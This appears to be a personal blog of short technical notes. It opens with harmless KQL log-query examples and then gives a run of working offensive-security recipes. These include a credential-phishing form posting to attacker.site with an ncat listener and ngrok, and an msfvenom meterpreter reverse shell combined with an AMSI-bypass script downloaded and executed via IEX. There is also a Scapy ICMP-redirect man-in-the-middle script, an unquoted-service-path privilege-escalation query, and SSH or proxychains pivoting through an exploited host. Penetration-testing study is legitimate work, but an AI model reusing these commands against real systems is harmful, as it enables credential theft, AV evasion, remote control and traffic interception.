Auteur: MSX

Count

KQL – Count

Berichtauteur Door MSX
Berichtdatum mei 25, 2021
Geen reacties op KQL – Count

Returns the number of rows

Perf | where TimeGenerated >= ago(1h) and CounterName == "Bytes Received/sec" and CounterValue > 0 | count

Take & Limit

KQL – Take & Limit

Berichtauteur Door MSX
Berichtdatum mei 25, 2021
Geen reacties op KQL – Take & Limit

Take takes a random amount of record from the date set

Perf | where TimeGenerated >= ago(1h) and CounterName == "Bytes Received/sec" and CounterValue > 0 | take 5

Limit is the same and can be used to limit the amount of records returned

Perf | where TimeGenerated >= ago(1h) and CounterName == "Bytes Received/sec" and CounterValue > 0 | limit 5

Where

KQL – Where

Berichtauteur Door MSX
Berichtdatum mei 25, 2021
Geen reacties op KQL – Where

Where limits the result set

Search Table for data generated since a 1 hour ago

Perf | where TimeGenerated >= ago(1h)

ago allows you to select relative date ranges

d – days
h – hours
m – minutes
s – seconds
ms – milliseconds
microsecond – microseconds

Combine where with AND statement

Perf | where TimeGenerated >= ago(1h) and CounterName == "Bytes Received/sec" and CounterValue > 0

Combine where with OR statement

Perf | where TimeGenerated >= ago(1h) and (CounterName == "Bytes Received/sec" or CounterName == "% Processor Time" ) and CounterValue > 0

Stacking where operators (useful for in between processing (if/else etc.)

Perf | where TimeGenerated >= ago(1h) | where (CounterName == "Bytes Received/sec" or CounterName == "% Processor Time" ) | where CounterValue > 0

Simulate search with where command

//Search any column for string containing Bytes

Perf | where * has "Bytes"

//Search any column that starts with the string Bytes
Perf | where * hasprefix "Bytes"

//Search any column that ends with the string Bytes
Perf | where * hassuffix "Bytes"

//Search any column that contains with the string Bytes
Perf | where * contains "Bytes"

//Search any string in a column using regex
Perf | where InstanceName matches regex "[A-Z]:"

KQL – Search

Berichtauteur Door MSX
Berichtdatum mei 25, 2021
Geen reacties op KQL – Search

String search through all tables (do not use in production!)

search "memory"

Limit string search to a specific range of tables

search in (Perf, Events) "memory"

Limit string search to one table

Perf| search "memory"

Search for exact string "Available MBytes"

Perf | search CounterName == "Available MBytes"

Search for string in column that contains MBytes

Perf | search CounterName:"MBytes"

Search for string in all columns containing string Bytes

Perf | search "Bytes"

Search for string in all columns starting with Bytes

Perf | search * startswith "Bytes"

Search for string in all columns ending with Bytes

Perf | search * endswith "Bytes"

Search for string in all columns that starts with Free and ends with Bytes

Perf | search "Free*bytes"

Search for string in all columns that starts with Free and ends with Bytes that contain either C: or D:

Perf | search "Free*bytes" and ("C:" or "D:")

Search table column for string using regex

Perf | search InstanceName matches regex "[A-Z]:"

wmic

Find unquoted service paths (Win)

Berichtauteur Door MSX
Berichtdatum juli 25, 2020
Geen reacties op Find unquoted service paths (Win)

wmic service get name,displayname,pathname,startmode | findstr /I “auto” | findstr /I /v “c:\windows\” | findstr /i /v “””

netcat Uncategorized

Harvest credentials

Berichtauteur Door MSX
Berichtdatum juli 16, 2020
Geen reacties op Harvest credentials

Start nectat listener

ncat -lvp 4444

Start ngrok to make url accessible

./ngrok http 4444

Send page to users:

<b>Login required</b><br><br><b>ENTER Credentials:<br><br><form action=”http://attacker.site” method=”GET”><input type=”text” name=”email” placeholder=”Your Username”><br><input type=”password” name=”password”><br><input type=”submit” value=”Submit”></form>

AV Evasion Pentest

AV Evasion Bypass ASMI

Berichtauteur Door MSX
Berichtdatum juni 1, 2020
Geen reacties op AV Evasion Bypass ASMI

1. create MSFVENOM

msfvenom -p windows/x64/meterpreter/reverse_https -f psh LHOST=10.10.20.142 LPORT=443 > ‘/home/kali/http/https2.ps1’

2. copy raw from https://github.com/aloksaurabh/OffenPowerSh/tree/master/Bypass

curl https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1 > demo.ps1

3. python2 -m SimpleHTTPServer 80

4. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/demo.ps1’);Invoke-AlokS-AvBypass

5. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/https2.ps1’)

ICMP-Redirect Attack

Berichtauteur Door MSX
Berichtdatum april 18, 2020
Geen reacties op ICMP-Redirect Attack

Enable IP forwarding and Source NAT translation for Victim subnet

#sudo echo 1 > /proc/sys/net/ipv4/ip_forward
#sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE

#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only for traffic forward)

#sudo iptables -t nat -L

ip – gateway = 10.100.31.1
ip – victim = 10.100.13.126
ip – attacker = 10.100.13.20
ip- victime website = 10.23.56.100

Scapy create ICMP-Redirect packet (type=5) for a better gateway to destination 10.23.56.100

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
bound method IP.display of IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
bound method IP.display of IP  src=10.100.13.126 dst=10.23.56.100 |>>

# Creating and sending ICMP redirect packets

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim Ip

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>

Uncategorized

Port Forwarding

Berichtauteur Door MSX
Berichtdatum april 13, 2020
Geen reacties op Port Forwarding

Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host

ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117

Use Proxychain to route traffic through exploited host

ssh -D 127.0.0.1:1090 msx@192.168.68.117

Usage example nmap scan

proxychains nmap -sT -v 10.10.20.140

Proxychains

Berichtauteur Door MSX
Berichtdatum april 13, 2020
Geen reacties op Proxychains

proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129

proxychains nmap -sTV -n -PN -p 21 10.10.51.21